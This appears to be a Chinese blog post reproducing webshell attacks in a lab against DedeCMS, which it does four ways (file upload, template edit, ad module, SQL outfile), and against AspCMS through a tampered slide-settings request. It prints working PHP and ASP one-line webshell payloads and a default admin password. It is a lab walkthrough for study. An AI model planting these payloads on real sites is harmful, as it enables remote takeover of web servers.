dedecms(四种webshell姿势)aspcms webshell漏洞复现

dedecms

我们首先访问靶场

姿势1上传文件getshell

首先登录后台

点击文件管理器》文件上传

写一个php一句话木马文件

然后进行上传

点击上传之后提示上传成功并且目录里也显示了我们刚刚上传的文件,并且最上面有显示文件的路径

然后我们进行访问并连接

连接成功

姿势2 修改模版文件getshell

点击模版找到index.html 并点击修改

在代码的开头写入php一句话木马,点击保存

然后返回点击生成,修改网页为静态网页

然后进行访问

并连接

姿势3后台任意命令执行getshell

模块》广告管理》增加一个新广告

在广告内容里写入一句话木马

然后点击代码在,里面找到文件的路径

访问并连接

姿势4 sql命令执行写入php木马getshell

点击系统》sql命令执行工具》写入payload

复制代码
select '<?php @eval($_POST[cmd]);?>' into outfile "D:/phpstudy_pro/www/dedecms/2.php"

然后直接访问我们写入的2.php文件并进行连接

aspcms

访问网站出现报错

说明浏览器不会给我们自动访问index网页,那么我们在url后面加上index.asp再进行访问

访问后台管理页面,并使用账号密码登录

admin 123456

然后点击扩展》幻灯片设置》点击保存时进行抓包

在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp

文件内容

1%25><%25Eval(Request(chr(65)))%25><%25 密码为a

然后进行访问并进行连接

使用菜刀进行连接,并成功getshell

相关推荐
数据大魔方10 小时前
【期货量化实战】日内动量策略:顺势而为的短线交易法(Python源码)
开发语言·数据库·python·mysql·算法·github·程序员创富
Chasing Aurora11 小时前
数据库连接+查询优化
数据库·sql·mysql·prompt·约束
倔强的石头_11 小时前
【金仓数据库】ksql 指南(六)—— 创建与管理用户和权限(KingbaseES 安全控制核心)
数据库
小熊officer12 小时前
Python字符串
开发语言·数据库·python
渐暖°12 小时前
JDBC直连ORACLE进行查询
数据库·oracle
萧曵 丶12 小时前
Next-Key Lock、记录锁、间隙锁浅谈
数据库·sql·mysql·mvcc·可重复读·幻读
做cv的小昊13 小时前
【TJU】信息检索与分析课程笔记和练习(7)数据库检索—Ei
数据库·笔记·学习·全文检索
zgl_2005377913 小时前
ZGLanguage 解析SQL数据血缘 之 标识提取SQL语句中的目标表
java·大数据·数据库·数据仓库·hadoop·sql·源代码管理
莳花微语13 小时前
记录一次OGG进程abended,报错OGG-01431、OGG-01003、OGG-01151、OGG-01296问题的处理
数据库·sql·mysql
尋有緣13 小时前
力扣1355-活动参与者
大数据·数据库·leetcode·oracle·数据库开发